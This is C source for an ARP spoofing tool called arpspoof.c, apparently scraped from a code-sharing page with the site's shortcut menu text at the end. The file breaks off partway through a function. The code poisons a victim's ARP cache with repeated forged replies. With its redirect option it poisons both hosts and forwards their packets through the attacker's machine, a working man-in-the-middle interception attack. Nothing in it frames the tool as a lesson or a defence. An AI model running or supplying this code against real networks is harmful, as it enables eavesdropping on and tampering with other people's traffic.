📄 arpspoof.c
字号:
#include "/usr/include/libnet.h"#include <pcap.h>#include<netinet/in.h>#include<netinet/in_systm.h>#include<netinet/ip.h>#include<netinet/if_ether.h>#include<string.h>u_char local_mac[6];u_char local_ip[4];u_char dst_mac[6];u_char dst_ip[4];u_char str_dst_ip[20];u_char broad[6]={0xff,0xff,0xff,0xff,0xff,0xff};int redirect=0;//wether to redirectint get_cmdline(int argc,char *argv[]);int get_local_net(char *device);int arpsend(char*device,u_char*arp_spa,u_char*arp_sha,u_char*arp_tpa,u_char * arp_tha,u_char*dst,u_short op);int forward_packet(char * device,u_char * src_mac,u_char * dst_mac,u_char * packet);u_char * get_spa(u_char * p);u_char * get_tpa(u_char * p);u_char * get_sha(u_char * p);u_char * get_ipdst(u_char * p);int get_arp_op(u_char *p);int get_ether_type(u_char *p);int test_ip(u_char * ip1,u_char * ip2);int get_dst_mac(pcap_t* pt,struct pcap_pkthdr *hd);u_char * get_ether_shost(u_char * p);u_char * get_ether_dhost(u_char *p);int test_mac(u_char * mac1,u_char * mac2);int main(int argc, char *argv[]){ get_cmdline(argc ,argv); u_char *packet; char errbuf[LIBNET_ERRBUF_SIZE]; char filter_str[100]="arp"; struct bpf_program fp; /* hold compiled program */ char *dev; pcap_t* descr; struct pcap_pkthdr hdr; /* pcap.h */ bpf_u_int32 maskp; /* subnet mask*/ bpf_u_int32 netp; /* ip*/ int promisc=0; /* set to promisc mode*/ int pcap_time_out=5; int c; dev = pcap_lookupdev(errbuf); if(dev == NULL){ fprintf(stderr,"%s\n",errbuf); return -1; } c=pcap_lookupnet(dev,&netp,&maskp,errbuf); if(c==-1){ fprintf(stderr,"%s\n",errbuf); return -1; } descr = pcap_open_live(dev,BUFSIZ,promisc,pcap_time_out,errbuf); if(descr == NULL){ printf("pcap_open_live(): %s\n",errbuf); return -1; } if(pcap_compile(descr,&fp,filter_str,0,netp) == -1) { printf("Error calling pcap_compile\n"); return -1; } if(pcap_setfilter(descr,&fp) == -1) { printf("Error setting filter\n"); return -1; }get_local_net(dev);printf("local host :%d.%d.%d.%d->",local_ip[0], local_ip[1],local_ip[2],local_ip[3]); printf("%x;%x:%x:%x;%x;%x\n",local_mac[0],local_mac[1],local_mac[2],local_mac[3],local_mac[4],local_mac[5]);if(arpsend(dev,local_ip,local_mac,dst_ip,dst_mac,broad,1)==-1){ printf( "send arp request packet failed\n"); exit(EXIT_FAILURE);}get_dst_mac(descr,&hdr);printf("destnation host:%d.%d.%d.%d->",dst_ip[0], dst_ip[1],dst_ip[2],dst_ip[3]);printf("%x;%x:%x:%x;%x;%x\n",dst_mac[0],dst_mac[1],dst_mac[2],dst_mac[3],dst_mac[4],dst_mac[5]);printf("listen the arp request to %d.%d.%d.%d\n",dst_ip[0], dst_ip[1],dst_ip[2],dst_ip[3]);printf("start......\n");while(1){ packet=pcap_next(descr, &hdr); if(test_ip(get_tpa(packet),dst_ip)==0||get_arp_op(packet)!=1||packet==NULL) { continue; }if(fork()==0) { u_char * v_mac; u_char * v_ip; char str_v_ip[20]; v_ip=get_spa(packet); v_mac=get_sha(packet); sprintf(str_v_ip,"%d.%d.%d.%d",v_ip[0],v_ip[1],v_ip[2],v_ip[3]); printf("get arp request from %sto %s\n",str_v_ip,str_dst_ip); if(redirect==0) { while(1) { printf("send spoof arp request to %s\n",str_v_ip); if(arpsend(dev,dst_ip,local_mac,v_ip,v_mac,v_mac,2)==-1) { printf("send spoof arp reply error\n"); exit(EXIT_FAILURE); } sleep(5); } } if(fork()==0) { while(1) { printf("send spoof arp request to %s\n",str_v_ip); if(arpsend(dev,dst_ip,local_mac,v_ip,v_mac,v_mac,2)==-1) { printf("send spoof arp reply error\n"); exit(EXIT_FAILURE); } printf("send spoof arp request to %s\n",str_dst_ip); if(arpsend(dev,v_ip,local_mac,dst_ip,dst_mac,dst_mac,2)==-1) { printf("send spoof arp reply error\n"); exit(EXIT_FAILURE); } sleep(5); } } pcap_t* fwp; u_char * fpacket; struct pcap_pkthdr fwh; /* pcap.h */ struct bpf_program fp1; /* hold compiled program */ char filter_str_[100]; sprintf(filter_str_,"src %s",str_v_ip); fwp = pcap_open_live(dev,BUFSIZ,promisc,pcap_time_out,errbuf); if(fwp == NULL){ printf("pcap_open_live(): %s\n",errbuf); return -1; } /* if(pcap_compile(fwp,&fp1,filter_str_,0,netp) == -1) { printf("Error calling pcap_compile\n"); return -1; } if(pcap_setfilter(fwp,&fp1) == -1) { printf("Error setting filter\n"); return -1; } */ while(1) { fpacket=pcap_next(fwp, &fwh); if(fpacket==NULL||get_ether_type(fpacket)!=ETHERTYPE_IP) { continue; } /* if(test_mac(get_ether_shost(fpacket),v_mac)==0) { continue; } */ if(test_mac(get_ether_dhost(fpacket),local_mac)==0) { continue; } u_char * d=get_ipdst(fpacket); if( test_ip(get_ipdst(fpacket),dst_ip)==1) { if(forward_packet(dev,local_mac,dst_mac,fpacket)==1) printf("forward a packet from %s to %d.%d.%d.%d\n",str_v_ip,d[0],d[1],d[2],d[3]); } if( test_ip(get_ipdst(fpacket),v_ip)==1) { if(forward_packet(dev,local_mac,v_mac,fpacket)==1) printf("forward a packet from %sto %d.%d.%d.%d\n",str_dst_ip,d[0],d[1],d[2],d[3]); } } }//fork() }//while } int get_cmdline(int argc,char *argv[]){ char c; char string[]="d:rh"; while((c = getopt(argc, argv, "d:rh")) != EOF){ if(c=='d') { *(unsigned int*)dst_ip=(unsigned int)inet_addr(optarg); strcpy(str_dst_ip,optarg); } if(c=='r') { redirect=1; } if(c=='h') { printf("usage:-d ipaddr\n"); } } return 1; } //get local host's mac address and ip addressint get_local_net(char * dev){ int fd, intrface, retn = 0; int i; struct ifreq buf[15]; struct arpreq arp; struct ifconf ifc;if ((fd = socket(AF_INET, SOCK_DGRAM, 0)) >= 0) { ifc.ifc_len = sizeof buf; ifc.ifc_buf = (caddr_t) buf; if (!ioctl(fd, SIOCGIFCONF, (char *) &ifc)) { intrface = ifc.ifc_len / sizeof(struct ifreq); while (intrface-- > 0) { if(strcmp(buf[intrface].ifr_name,dev)!=0) continue; printf(" device: %s\n", buf[intrface].ifr_name); //get ip address if (!(ioctl(fd, SIOCGIFADDR, (char *) &buf[intrface]))) { *(unsigned int*)local_ip=(unsigned int )inet_addr(inet_ntoa(((struct sockaddr_in *) (&buf[intrface].ifr_addr))->sin_addr)); } else { char str[256]; sprintf(str, "cpm: ioctl device %s", buf[intrface].ifr_name); perror(str); }//Get HW ADDRES of the net card if (!(ioctl(fd, SIOCGIFHWADDR, (char *) &buf[intrface]))) {⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -